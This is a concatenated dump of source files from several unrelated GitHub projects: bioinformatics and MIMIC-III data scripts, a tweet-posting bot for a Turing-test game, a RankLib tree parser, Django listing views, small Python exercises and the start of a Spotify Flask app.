elif sys.argv[5] == 'None': ### bulk list = none
print ('No bulk gene list')
else :
print('wrong bulk expression information')
sys.exit()
if not sys.argv[2] == 'None':
h_gene_list =get_gene_list(sys.argv[2]) # 'sc_gene_list.txt')#
print ('read sc gene list')
elif sys.argv[6] == 'None': ### sc list = none
print('No sc gene list')
else:
print('wrong sc expression information')
sys.exit()
if not sys.argv[5] == 'None':
store = pd.HDFStore(sys.argv[5])#'/home/yey3/sc_process_1/new_bulk_mouse/prs_calculation/mouse_bulk.h5') ### bulk RNA-seq expression data )#
rpkm_bulk = store['rpkm']
store.close()
print('read bulk RNA-seq expression')
elif sys.argv[1] == 'None': ### sc list = none
print('No bulk gene expression')
else:
print('wrong bulk expression information')
sys.exit()
if not sys.argv[6] == 'None':
store = pd.HDFStore(sys.argv[6])#'/home/yey3/sc_process_1/rank_total_gene_rpkm.h5') # scRNA-seq expression data )#
print("SDFSDF")
print(store)
print(list(store.keys()))
#rpkm = store['rpkm']
rpkm = store['/RPKMs']
store.close()
print('read sc RNA-seq expression')
elif sys.argv[2] == 'None': ### sc list = none
print('No sc gene expression ')
else:
print('wrong sc expression information')
sys.exit()
if sys.argv[1] == 'None' and sys.argv[2] == 'None':
print ('no bulk or sc data')
sys.exit()
if sys.argv[5] == 'None' and sys.argv[6] == 'None':
print ('no bulk or sc data')
sys.exit()
########## generate NEPDF matrix
gene_pair_label = []
s=open(sys.argv[3])#'mmukegg_new_new_unique_rand_labelx.txt')#) ### read the gene pair and label file
for line in s:
gene_pair_label.append(line)
gene_pair_index = get_sepration_index(sys.argv[4])#'mmukegg_new_new_unique_rand_labelx_num.npy')#sys.argv[6]) # read file speration index
s.close()
gene_pair_label_array = array(gene_pair_label)
for i in range(len(gene_pair_index)-1): #### many sperations
print (i)
start_index = gene_pair_index[i]
end_index = gene_pair_index[i+1]
x = []
y = []
z = []
for gene_pair in gene_pair_label_array[start_index:end_index]: ## each speration
separation = gene_pair.split()
if sys.argv[7] == '1':
x_gene_name,y_gene_name,label = separation[0],separation[1],separation[2]
y.append(label)
else:
x_gene_name, y_gene_name = separation[0], separation[1]
z.append(x_gene_name+'\t'+y_gene_name)
if not sys.argv[1] == 'None':
x_tf_bulk = log10(rpkm_bulk[h_gene_list_bulk[x_gene_name]][0:249] + 10 ** -2) ## 249 means the number of samples, users can just remove '[0:249]'
x_gene_bulk = log10(rpkm_bulk[h_gene_list_bulk[y_gene_name]][0:249] + 10 ** -2)
H_T_bulk = histogram2d(x_tf_bulk, x_gene_bulk, bins=32)
H_bulk= H_T_bulk[0].T
HT_bulk = (log10(H_bulk / 43261 + 10 ** -4) + 4)/4
if not sys.argv[2] == 'None':
x_tf = log10(rpkm[int(h_gene_list[x_gene_name])][0:43261] + 10 ** -2) # ## 43261 means the number of samples in the sc data, we also have one row that is sum of all cells, so the real size is 43262, that is why we use [0:43261]. For TF target prediction or other data, just remove "[0:43261]"
x_gene = log10(rpkm[int(h_gene_list[y_gene_name])][0:43261] + 10 ** -2)# For TF target prediction, remove "[0:43261]"
H_T = histogram2d(x_tf, x_gene, bins=32)
H = H_T[0].T
HT = (log10(H / 43261 + 10 ** -4) + 4) / 4
if sys.argv[1] == 'None': ## bulk is none, only sc
x.append(HT)
elif sys.argv[2] == 'None': ## sc is none, only bulk
x.append(HT_bulk)
else:
x.append(concatenate((HT, HT_bulk), axis=0))
if (len(x)>0):
xx = array(x)[:, :, :, newaxis]
else:
xx = array(x)
save(save_dir+'/Nxdata_tf' + str(i) + '.npy', xx)
if sys.argv[7] == '1':
save(save_dir+'/ydata_tf' + str(i) + '.npy', array(y))
save(save_dir+'/zdata_tf' + str(i) + '.npy', array(z))
``` |
{
"source": "jjfeng/mimic3_benchmarks",
"score": 3
} |
#### File: mimic3benchmark/scripts/create_in_hospital_mortality.py
```python
import sys
import os
import argparse
import pandas as pd
import random
import numpy as np
def parse_args(args):
parser = argparse.ArgumentParser(description="Create data for in-hospital mortality prediction task.")
parser.add_argument(
'root_path',
type=str,
help="Path to root folder containing train and test sets.")
parser.add_argument(
'--output-path',
type=str,
default="../../data/mimic/in-hospital-mortality/",
help="Directory where the created data should be stored.")
parser.add_argument(
'--seed',
type=int,
default=100,
help="random seed")
parser.add_argument(
'--train-csv',
type=str,
default="../../data/mimic/train_ids.csv",
help="csv file with input train ids")
parser.add_argument(
'--test-csv',
type=str,
default="../../data/mimic/test_ids.csv",
help="csv file with input test ids")
args, _ = parser.parse_known_args()
assert args.output_path != args.root_path
args.patient_id_csvs = {
"train": args.train_csv,
"test": args.test_csv}
return args
def process_partition(args, partition, eps=1e-6, n_hours=48):
patient_id_csv = args.patient_id_csvs[partition]
patients = np.array(np.genfromtxt(patient_id_csv, delimiter=","), dtype=int)
print(partition, "patient ids", patients)
output_dir = os.path.join(args.output_path, partition)
if not os.path.exists(output_dir):
os.mkdir(output_dir)
list_file_data = []
for (patient_index, patient) in enumerate(patients):
patient = str(patient)
patient_folder = os.path.join(args.root_path, patient)
patient_ts_files = list(filter(lambda x: x.find("timeseries") != -1, os.listdir(patient_folder)))
for ts_filename in patient_ts_files:
with open(os.path.join(patient_folder, ts_filename)) as tsfile:
lb_filename = ts_filename.replace("_timeseries", "")
label_df = pd.read_csv(os.path.join(patient_folder, lb_filename))
first_row_label = label_df.iloc[0]
# empty label file
if label_df.shape[0] == 0:
continue
mortality = int(first_row_label["Mortality"])
los = 24.0 * first_row_label['Length of Stay'] # in hours
if pd.isnull(los):
print("\n\t(length of stay is missing)", patient, ts_filename)
continue
if los < n_hours - eps:
continue
ts_lines = tsfile.readlines()
header = ts_lines[0]
ts_lines = ts_lines[1:]
event_times = [float(line.split(',')[0]) for line in ts_lines]
ts_lines = [line for (line, t) in zip(ts_lines, event_times)
if -eps < t < n_hours + eps]
# no measurements in ICU
if len(ts_lines) == 0:
print("\n\t(no events in ICU) ", patient, ts_filename)
continue
output_ts_filename = patient + "_" + ts_filename
with open(os.path.join(output_dir, output_ts_filename), "w") as outfile:
outfile.write(header)
for line in ts_lines:
outfile.write(line)
output_lb_filename = patient + "_" + lb_filename
with open(os.path.join(output_dir, output_lb_filename), "w") as outfile:
outfile.write("Age,Gender,Ethnicity\n")
outfile.write("%f,%d,%d" % (first_row_label["Age"], first_row_label["Gender"], first_row_label["Ethnicity"]))
list_file_data.append((patient, output_ts_filename, output_lb_filename, n_hours, mortality))
if (patient_index + 1) % 100 == 0:
print("processed {} / {} patients".format(patient_index + 1, len(patients)), end='\r')
print("\n", len(list_file_data))
list_file_data = sorted(list_file_data)
with open(os.path.join(output_dir, "listfile.csv"), "w") as listfile:
listfile.write('patient,stay,meta,period_length,y_true\n')
for list_file_entry in list_file_data:
listfile.write('%s,%s,%s,%d,%d\n' % list_file_entry)
def main(args=sys.argv[1:]):
args = parse_args(args)
np.random.seed(args.seed)
if not os.path.exists(args.output_path):
os.makedirs(args.output_path)
process_partition(args, "train")
process_partition(args, "test")
if __name__ == '__main__':
main()
```
#### File: mimic3benchmark/scripts/split_train_and_test.py
```python
import sys
import os
import shutil
import argparse
import numpy as np
def parse_args(args):
parser = argparse.ArgumentParser(description='Split data into train and test sets.')
parser.add_argument('subjects_root_path', type=str, help='Directory containing subject sub-directories.')
parser.add_argument('--seed', type=int, default=100, help='random seed')
parser.add_argument('--test-proportion', type=float, default=0.25, help='random seed')
parser.add_argument(
'--train-csv',
type=str,
default="../../data/mimic/train_ids.csv")
parser.add_argument(
'--test-csv',
type=str,
default="../../data/mimic/test_ids.csv")
args, _ = parser.parse_known_args(args)
return args
def main(args=sys.argv[1:]):
args = parse_args(args)
np.random.seed(args.seed)
folders = os.listdir(args.subjects_root_path)
patient_ids = list(filter(str.isdigit, folders))
num_test = int(args.test_proportion * len(patient_ids))
shuffled_patient_ids = np.random.permutation(patient_ids)
train_patients = np.array(shuffled_patient_ids[:-num_test], dtype=int).reshape((-1,1))
test_patients = np.array(shuffled_patient_ids[-num_test:], dtype=int).reshape((-1,1))
print(test_patients)
np.savetxt(args.train_csv, train_patients, fmt='%d', delimiter=",")
np.savetxt(args.test_csv, test_patients, fmt='%d', delimiter=",")
if __name__ == '__main__':
main()
``` |
{
"source": "jjfeore/turingtweets",
"score": 3
} |
#### File: turingtweets/scripts/tweet_fake_tweet.py
```python
import os
import tweepy
from sqlalchemy import (
Column,
Unicode,
Integer,
Boolean,
)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.schema import MetaData
from sqlalchemy import engine_from_config
from sqlalchemy.orm import sessionmaker
NAMING_CONVENTION = {
"ix": 'ix_%(column_0_label)s',
"uq": "uq_%(table_name)s_%(column_0_name)s",
"ck": "ck_%(table_name)s_%(constraint_name)s",
"fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
"pk": "pk_%(table_name)s"
}
metadata = MetaData(naming_convention=NAMING_CONVENTION)
Base = declarative_base(metadata=metadata)
class Tweet(Base):
"""Model for a single tweet."""
__tablename__ = 'tweets'
id = Column(Integer, primary_key=True)
tweet = Column(Unicode)
class FakeTweet(Base):
"""Model for a single fake tweet."""
__tablename__ = 'fake-tweets'
id = Column(Integer, primary_key=True)
faketweet = Column(Unicode)
tweeted = Column(Boolean)
shown = Column(Integer)
chosen = Column(Integer)
def get_engine(settings, prefix='sqlalchemy.'): # pragma: no cover
return engine_from_config(settings, prefix)
def get_fake_tweet():
test_dict = {'sqlalchemy.url': os.environ.get('DATABASE_URL')}
engine = get_engine(test_dict)
SessionFactory = sessionmaker(bind=engine)
session = SessionFactory()
if session.query(FakeTweet).filter_by(tweeted=False).first():
fake_tweet = session.query(FakeTweet).filter_by(tweeted=False).first().faketweet
session.query(FakeTweet).filter(FakeTweet.faketweet == fake_tweet).update({'tweeted':True})
session.commit()
tweet_fake_tweet(fake_tweet)
def tweet_fake_tweet(tweet): # pragma: no cover
auth = tweepy.OAuthHandler(os.environ.get('CONSUMER_KEY'), os.environ.get('CONSUMER_SECRET'))
auth.set_access_token(os.environ.get('ACCESS_TOKEN'), os.environ.get('ACCESS_TOKEN_SECRET'))
api = tweepy.API(auth)
api.update_status(status=tweet)
if __name__ == "__main__": # pragma: no cover
print('running tweet_fake_tweet...')
get_fake_tweet()
``` |
{
"source": "jjfiv/ltr2net",
"score": 3
} |
#### File: ltr2net/forest2gen/forest2gen.py
```python
import xml.etree.ElementTree as ET
import gzip
from collections import defaultdict
import numpy as np
class EvalNode(object):
def __init__(self, fid, value):
self.yes = None
self.no = None
self.weight = 1.0
self.fid = fid
self.value = value
def eval(self, arr):
if arr[self.fid] <= self.value:
return self.weight * self.yes.eval(arr)
else:
return self.weight * self.no.eval(arr)
def visit(self, fn):
fn(self)
self.yes.visit(fn)
self.no.visit(fn)
class EvalLeaf(object):
def __init__(self, response):
self.response = response
self.weight = 1.0
def eval(self, arr):
return self.weight * self.response
def visit(self, fn):
fn(self)
class EvalEnsemble(object):
def __init__(self, trees):
self.trees = trees
self.weight = 1.0
def eval(self, arr):
return self.weight * sum([t.eval(arr) for t in self.trees])
def visit(self, fn):
fn(self)
for t in self.trees:
t.visit(fn)
def find_splits(self):
splits = []
def include(node, splits):
if type(node) == EvalNode:
splits.append(node)
self.visit(lambda n: include(n, splits))
return splits
def find_split_points_by_fid(self):
split_points = defaultdict(list)
# include all observed points
for split in self.find_splits():
split_points[split.fid].append(split.value)
return dict((fid, set(ps)) for fid, ps in split_points.items())
def split_points_to_generator(ensemble, fstats):
split_points = ensemble.find_split_points_by_fid()
generator_data = {}
for fid, point_set in split_points.items():
mid_points = [fstats[fid]['min'],
fstats[fid]['max'], fstats[fid]['mean']]
point_list = sorted(point_set)
for i in range(len(point_list)-1):
mid_points.append((point_list[i] + point_list[i+1])/2)
generator_data[fid] = mid_points
for fid, info in fstats.items():
if fid not in generator_data:
generator_data[fid] = list(
set([info['min'], info['mean'], info['max']]))
num_features = len(generator_data) + 1
print('num_features {0}'.format(num_features))
def generate_batch(n):
y = np.zeros(n)
X = np.zeros((n, num_features))
for fid in generator_data.keys():
X[:, fid] = np.random.choice(
generator_data[fid], size=n, replace=True)
for i in range(n):
y[i] = ensemble.eval(X[i, :])
return X, y
return generate_batch
def _parse_split(split):
output = split.find('output')
# if there's an <output> tag, we're at a leaf:
if output is not None:
return EvalLeaf(float(output.text))
# otherwise, split based on this feature.
fid = int(split.findtext('feature'))
cond = float(split.findtext('threshold'))
current = EvalNode(fid, cond)
# recursively translate the whole tree.
for child in split.findall('split'):
pos = child.get('pos')
recurse = _parse_split(child)
if pos == 'left':
current.yes = recurse
else:
current.no = recurse
return current
def load_ranklib_model_reader(reader):
comments = []
model = []
for line in reader:
if line.startswith('##'):
comments.append(line)
continue
else:
model.append(line)
ensemble = ET.fromstring('\n'.join(model))
keep = []
for tree in ensemble.findall('tree'):
root_split_node = tree.find('split')
root = _parse_split(root_split_node)
root.weight = float(root_split_node.get("weight", default="1.0"))
keep.append(root)
return EvalEnsemble(keep)
def smart_reader(path):
if path.endswith('.gz'):
return gzip.open(path, 'rt')
return open(path, 'r')
def load_ranklib_model(path):
with smart_reader(path) as fp:
return load_ranklib_model_reader(fp)
ensemble = None
if __name__ == '__main__':
ensemble = load_ranklib_model(
'tree_parsing/mq07.lambdaMart.l10.kcv10.tvs90.gz')
``` |
{
"source": "jjfiv/mm2020",
"score": 3
} |
#### File: jjfiv/mm2020/crosenberg16.py
```python
def print_in_block(message):
"""
print_in_block prints a message fancy
"""
print("="*4, message)
print("This is going to cause a problem")
print_in_block("knock knock!")
print_in_block("who's there?")
print_in_block("owls go")
print_in_block("owls go who?")
print_in_block("exactly!")
print("dsdp is the best") # everyone is the best
```
#### File: jjfiv/mm2020/dave.py
```python
def print_in_block(message):
"""
print_in_block prints a message fancy
"""
print("="*4, message)
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("hatch")
print_in_block("\thatch who?")
print_in_block("bless you!")
print('\n')
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("ether")
print_in_block("\tether who?")
print_in_block("ether bunny here!")
print('\n')
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("Stella")
print_in_block("\tStella who?")
print_in_block("Stellanother ether bunny here!")
print('\n')
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("cargo")
print_in_block("\tcargo who?")
print_in_block("Cargo beep beep and run over all the ether bunnies!")
print('\n')
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("owls go")
print_in_block("\towls go who?")
print_in_block("exactly!")
```
#### File: jjfiv/mm2020/mbrody22.py
```python
def print_in_block(message):
"""
print_in_block prints a message fancy
"""
print("="*4, message)
print('\n')
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("interrupting cow")
print_in_block("\tinterrupti-")
print_in_block("MOO!")
print('\n')
``` |
{
"source": "jjfleet/Capstone",
"score": 2
} |
#### File: Projects/events/views.py
```python
from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from .models import EventListing
from django.contrib.auth.models import User
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
from events.forms import EventCreateView, EventUpdateForm
from django.contrib import messages
from django.urls import reverse
@login_required
def eventCreate(request):
if request.method == 'POST':
form = EventCreateView(request.POST, request.FILES)
if form.is_valid():
form.instance.author = request.user
form = form.save()
messages.success(request, "Your event has been created!")
return redirect(reverse('event-detail', kwargs={'pk': form.pk}))
else:
form = EventCreateView()
return render(request, 'events/eventlisting_form.html', {'form': form})
def eventUpdateView(request, pk):
instance = get_object_or_404(EventListing, id=pk)
form = EventUpdateForm(request.POST or None, instance=instance)
if form.is_valid():
form.save()
messages.success(request, "Your event has been updated!")
return redirect(reverse('event-detail', kwargs={'pk': pk}))
else:
e_form = EventUpdateForm(instance = EventListing.objects.get(pk=pk))
return render(request, 'events/eventupdate_form.html', {'e_form': e_form})
class EventPageView(ListView):
model = EventListing
template_name = 'events/events.html'
context_object_name = 'data'
ordering = ['-date_posted']
class UserEventPageView(ListView):
model = EventListing
template_name = 'events/user_event.html'
context_object_name = 'data'
paginate_by = 3
def get_queryset(self):
user = get_object_or_404(User, username=self.kwargs.get('username'))
return EventListing.objects.filter(author=user).order_by('-date_posted')
class EventUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = EventListing
fields = [] #models go here
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
def test_func(self):
event = self.get_object()
return self.request.user == event.author # do we need a conditional true/false here??
class EventDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = EventListing
success_url = '/'
def test_func(self):
event = self.get_object()
return self.request.user == event.author
class EventDetailView(DetailView):
model = EventListing
```
#### File: Projects/jobs/views.py
```python
from django.shortcuts import render, reverse, get_object_or_404, redirect
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from .models import JobListing
from django.contrib.auth.models import User
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
from django.utils import timezone
from django.db.models import Q
from django.contrib import messages
import datetime
from jobs.forms import JobCreateForm, JobUpdateForm
def job_create(request):
if request.method == 'POST':
form = JobCreateForm(request.POST)
if form.is_valid():
form.instance.author = request.user
form = form.save()
messages.success(request, "Your job has been created!")
return redirect(reverse('job-detail', kwargs={'pk': form.pk}))
else:
form = JobCreateForm(initial={
'phone_Number': request.user.profile.phone_Number,
'company': request.user.profile.company
}
)
return render(request, 'jobs/joblisting_form.html', {'form': form})
def jobUpdateView(request, pk):
instance = get_object_or_404(JobListing, id=pk)
form = JobUpdateForm(request.POST or None, instance=instance)
if form.is_valid():
form.save()
messages.success(request, "Your job has been created!")
return redirect(reverse('job-detail', kwargs={'pk': pk}))
else:
g_form = JobUpdateForm(instance = JobListing.objects.get(pk=pk))
return render(request, 'jobs/jobupdate_form.html', {'g_form': g_form})
class JobPageView(ListView):
model = JobListing
template_name = 'jobs/jobs.html'
context_object_name = 'data'
ordering = ['-date_posted']
class UserJobPageView(ListView):
model = JobListing
template_name = 'jobs/user_jobs.html'
context_object_name = 'data'
paginate_by = 3
def get_queryset(self):
user = get_object_or_404(User, username=self.kwargs.get('username'))
return JobListing.objects.filter(author=user).order_by('-date_posted')
class JobDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = JobListing
success_url = '/'
def test_func(self):
job = self.get_object()
return self.request.user == job.author
class JobDetailView(DetailView):
model = JobListing
# class JobSearchView(ListView):
# model = JobListing
# template_name = 'jobs/jobs.html'
# context_object_name = 'data'
# ordering = ['-date_posted']
#
# def get_queryset
```
#### File: Projects/sites/views.py
```python
from django.shortcuts import render, get_object_or_404
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from django.contrib.auth.models import User
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
from jobs.models import JobListing
from companies.models import CompanyListing
from consultants.models import ConsultantListing
from groups.models import GroupListing
from events.models import EventListing
from django.db.models import Value, CharField, Q
from django.contrib.postgres.search import SearchQuery
from django.template.loader import get_template, render_to_string
from django.shortcuts import render, get_object_or_404, redirect
from django.conf import settings
from django.contrib import messages
from django.core.mail import send_mail, EmailMultiAlternatives, EmailMessage
from .models import ContactUs
from .forms import ContactUsForm
def contactUs(request):
c_form = ContactUsForm(request.POST or None)
if c_form.is_valid():
instance = c_form.save()
contact = ContactUs.objects.get(id=instance.id)
subject = instance.subject
mail = EmailMultiAlternatives(to=[settings.EMAIL_HOST_USER], subject=subject)
mail.attach_alternative(render_to_string("sites/contact_message.html", {'all_items_feed': contact}), "text/html")
mail.send()
messages.success(request, 'The message has been sent, thanks!', 'alert alert-success alert-dismissable')
return redirect('sites-home')
context = {
"c_form": c_form,
}
template = 'sites/contact.html'
return render(request, template, {'c_form': c_form})
def home(request):
jobs = JobListing.objects.all().order_by('-date_posted').annotate(type=Value('job', CharField()))
companies = CompanyListing.objects.all().order_by('-date_posted').annotate(type=Value('company', CharField()))
events = EventListing.objects.all().order_by('-date_posted').annotate(type=Value('event', CharField()))
groups = GroupListing.objects.all().order_by('-date_posted').annotate(type=Value('group', CharField()))
consultants = ConsultantListing.objects.all().order_by('-date_posted').annotate(type=Value('consultant', CharField()))
results = list(jobs) + list(events) + list(companies) + list(groups) + list(consultants)
results = sorted(results, key=lambda obj: obj.date_posted, reverse=True)
return render(request, 'sites/index.html', {'all_items_feed': results})
def search(request):
template = 'sites/search.html'
queryitem = request.GET.get('q')
queryset = queryitem.split(' ')
results = []
for query in queryset:
jobs = JobListing.objects.filter(Q(title__icontains=query) | Q(summary__icontains=query)).annotate(type=Value('job', CharField()))
events = EventListing.objects.filter(Q(event_Name__icontains=query) | Q(event_Description__icontains=query)).annotate(type=Value('event', CharField()))
companies = CompanyListing.objects.filter(Q(company_Name__icontains=query) | Q(description__icontains=query)).annotate(type=Value('company', CharField()))
groups = GroupListing.objects.filter(Q(group_Name__icontains=query) | Q(description__icontains=query)).annotate(type=Value('group', CharField()))
consultants = ConsultantListing.objects.filter(Q(consultant_Name__icontains=query) | Q(description__icontains=query)).annotate(type=Value('consultant', CharField()))
results.extend(list(jobs) + list(events) + list(companies) + list(groups) + list(consultants))
results = sorted(results, key=lambda obj: obj.date_posted, reverse=True)
results = list(set(results))
context = {'data': results, 'item': query, 'len': len(results)}
return render(request, template, context)
class AboutPageView(TemplateView):
template_name = "sites/about.html"
class ContactPageView(TemplateView):
template_name = "sites/contact.html"
class TermsAndCondition(TemplateView):
template_name = "sites/termsandconditions.html"
# class IndexView(ListView):
# template_name = 'sites/index.html'
# model = JobListing
# context_object_name = 'data'
# def get_context_data(self, **kwargs):
# context = super(IndexView, self).get_context_data(**kwargs)
# context.update({
# 'character_universe_list': JobListing.objects.order_by('-date_posted'),
# 'more_context': CompanyListing.objects.order_by('-date_posted'),
# })
# return context
#
# def get_queryset(self):
# return JobListing.objects.order_by('-date_posted')
```
#### File: Projects/techpalmyapp/auto_task.py
```python
from django_cron import CronJobBase, Schedule
from jobs.models import JobListing
from companies.models import CompanyListing
from consultants.models import ConsultantListing
from events.models import EventListing
from groups.models import GroupListing
from datetime import timedelta
from django.utils import timezone
class MyCronJob(CronJobBase):
RUN_EVERY_MINS = 1 # every 2 hours
schedule = Schedule(run_every_mins=RUN_EVERY_MINS)
code = "techpamlyapp.MyCronJob"
def do(self):
DAY = 7
#Items older than 7 days
items = list(JobListing.objects.filter(date_posted__lte=timezone.now()-timedelta(days=DAY)))
items.extend(list(CompanyListing.objects.filter(date_posted__lte=timezone.now()-timedelta(days=DAY))))
items.extend(list(GroupListing.objects.filter(date_posted__lte=timezone.now()-timedelta(days=DAY))))
items.extend(list(ConsultantListing.objects.filter(date_posted__lte=timezone.now()-timedelta(days=DAY))))
items.extend(list(EventListing.objects.filter(date_posted__lte=timezone.now()-timedelta(days=DAY))))
for item in items:
item.is_Expired = True
item.save()
``` |
{
"source": "JJFReibel/MultidimensionalPythonArrays",
"score": 3
} |
#### File: JJFReibel/MultidimensionalPythonArrays/Array.py
```python
class Array_2D:
def __init__(self, x, y):
rows, cols = (x, y)
self.arr = [[None]*x for _ in range(y)]
def set(self, x, y, value):
self.arr[x][y] = value
def get(self, x, y):
return self.arr[x][y]
def output(self):
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
print(self.arr[i][j])
print()
def expand(self, x, y):
arr2 = [[None]*x for _ in range(y)]
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
arr2[i][j] = self.arr[i][j]
self.arr.clear()
self.arr = arr2
def reduce(self, x, y):
arr2 = [[None]*x for _ in range(y)]
for i in range(len(arr2)):
for j in range(len(arr2[0])):
arr2[i][j] = self.arr[i][j]
self.arr.clear()
self.arr = arr2
#3-D Array Class
class Array_3D:
def __init__(self, x, y, z):
rows, cols, thirds = (x, y, z)
self.arr = [[[None]*x for _ in range(y)] for _ in range(z)]
def set(self, x, y, z, value):
self.arr[x][y][z] = value
def get(self, x, y, z):
return self.arr[x][y][z]
def output(self):
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
for k in range(len(self.arr[0][0])):
print(self.arr[i][j][k])
print()
def expand(self, x, y, z):
arr2 = [[[None]*x for _ in range(y)] for _ in range(z)]
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
for k in range(len(self.arr[0][0])):
arr2[i][j][k] = self.arr[i][j][k]
self.arr.clear()
self.arr = arr2
def reduce(self, x, y, z):
arr2 = [[[None]*x for _ in range(y)] for _ in range(z)]
for i in range(len(arr2)):
for j in range(len(arr2[0])):
for k in range(len(arr2[0][0])):
arr2[i][j][k] = self.arr[i][j][k]
self.arr.clear()
self.arr = arr2
#4-D Array Class
class Array_4D:
def __init__(self, x, y, z, t):
rows, cols, thirds, tyme = (x, y, z, t)
self.arr = [[[[None]*x for _ in range(y)] for _ in range(z)] for _ in range(t)]
def set(self, x, y, z, t, value):
self.arr[x][y][z][t] = value
def get(self, x, y, z, t):
return self.arr[x][y][z][t]
def output(self):
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
for k in range(len(self.arr[0][0])):
for t in range(len(self.arr[0][0][0])):
print(self.arr[i][j][k][t])
print()
def expand(self, x, y, z, t):
arr2 = [[[[None]*x for _ in range(y)] for _ in range(z)] for _ in range(t)]
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
for k in range(len(self.arr[0][0])):
for t in range(len(self.arr[0][0][0])):
arr2[i][j][k] = self.arr[i][j][k]
self.arr.clear()
self.arr = arr2
def reduce(self, x, y, z, t):
arr2 = [[[[None]*x for _ in range(y)] for _ in range(z)] for _ in range(t)]
for i in range(len(arr2)):
for j in range(len(arr2[0])):
for k in range(len(arr2[0][0])):
for t in range(len(arr2[0][0][0])):
arr2[i][j][k][t] = self.arr[i][j][k][t]
self.arr.clear()
self.arr = arr2
#Example Use of 2D Array
myArr2D = Array_2D(5,2)
myArr2D.set(1,1,"Hello Mars!")
print(myArr2D.get(1,1))
print(myArr2D.arr)
print("Length 2D row before expansion: " + str(len(myArr2D.arr)))
print("Length 2D column before expansion: " + str(len(myArr2D.arr[0])))
myArr2D.output()
myArr2D.expand(7,3)
print("Length 2D row after expansion: " + str(len(myArr2D.arr)))
print("Length 2D column after expansion: " + str(len(myArr2D.arr[0])))
myArr2D.output()
myArr2D.reduce(1,2)
print("Length 2D row after reduction: " + str(len(myArr2D.arr)))
print("Length 2D column after reduction: " + str(len(myArr2D.arr[0])))
myArr2D.output()
#Example Use of 3D Array
myArr3D = Array_3D(5,2,3)
myArr3D.set(0,0,1,"Hello Mars!")
myArr3D.set(0,0,2,"Hello Mars!")
myArr3D.set(0,0,3,"Hello Mars!")
print("Length 3D third before expansion: " + str(len(myArr3D.arr)))
print("Length 3D row before expansion: " + str(len(myArr3D.arr[0])))
print("Length 3D column before expansion: " + str(len(myArr3D.arr[0][0])))
print()
myArr3D.output()
myArr3D.expand(7,3,4)
print("Length 3D third after expansion: " + str(len(myArr3D.arr)))
print("Length 3D row after expansion: " + str(len(myArr3D.arr[0])))
print("Length 3D column after expansion: " + str(len(myArr3D.arr[0][0])))
myArr3D.output()
myArr3D.reduce(1,2,3)
print("Length 3D third after reduction: " + str(len(myArr3D.arr)))
print("Length 3D row after reduction: " + str(len(myArr3D.arr[0])))
print("Length 3D column after expansion: " + str(len(myArr3D.arr[0][0])))
myArr3D.output()
#Example Use of 4D Array
myArr4D = Array_4D(5,2,3,4)
myArr4D.set(0,0,0,1,"Hello Mars!")
myArr4D.set(0,0,0,2,"Hello Mars!")
myArr4D.set(0,0,0,3,"Hello Mars!")
print("Length 4D tyme before expansion: " + str(len(myArr4D.arr)))
print("Length 4D third before expansion: " + str(len(myArr4D.arr[0])))
print("Length 4D row before expansion: " + str(len(myArr4D.arr[0][0])))
print("Length 4D column before expansion: " + str(len(myArr4D.arr[0][0][0])))
print()
myArr4D.expand(7,3,4,5)
print("Length 4D tyme after expansion: " + str(len(myArr4D.arr)))
print("Length 4D third after expansion: " + str(len(myArr4D.arr[0])))
print("Length 4D row after expansion: " + str(len(myArr4D.arr[0][0])))
print("Length 4D column after expansion: " + str(len(myArr4D.arr[0][0][0])))
myArr4D.output()
myArr4D.reduce(1,2,3,2)
print("Length 4D tyme after reduction: " + str(len(myArr4D.arr)))
print("Length 4D third after reduction: " + str(len(myArr4D.arr[0])))
print("Length 4D row after expansion: " + str(len(myArr4D.arr[0][0])))
print("Length 4D column after expansion: " + str(len(myArr4D.arr[0][0][0])))
myArr4D.output()
``` |
{
"source": "jjg28/SpotifyPlaylistGenerator-1",
"score": 3
} |
#### File: SpotifyPlaylistGenerator-1/flaskApp/application.py
```python
import os
from flask import Flask, session, request, redirect, render_template
from flask_session import Session
import spotipy
import json
import uuid
application = Flask(__name__)
application.config['SECRET_KEY'] = os.urandom(64)
application.config['SESSION_TYPE'] = 'filesystem'
application.config['SESSION_FILE_DIR'] = './.flask_session/'
Session(application)
spotify = ''
auth_manager=''
caches_folder = './.spotify_caches/'
if not os.path.exists(caches_folder):
os.makedirs(caches_folder)
scope = 'user-top-read user-read-playback-state streaming ugc-image-upload playlist-modify-public'
@application.route('/', methods=['GET','POST'])
def signIN():
global spotify
global auth_manager
if not session.get('uuid'):
# Step 1. Visitor is unknown, give random ID
session['uuid'] = str(uuid.uuid4())
auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path(), show_dialog=True, scope=scope)
spotify = spotipy.Spotify(auth_manager=auth_manager)
if request.args.get("code"):
# Step 3. Being redirected from Spotify auth page
auth_manager.get_access_token(request.args.get("code"))
return redirect('/home')
if not auth_manager.get_cached_token():
# Step 2. Display sign in link when no token
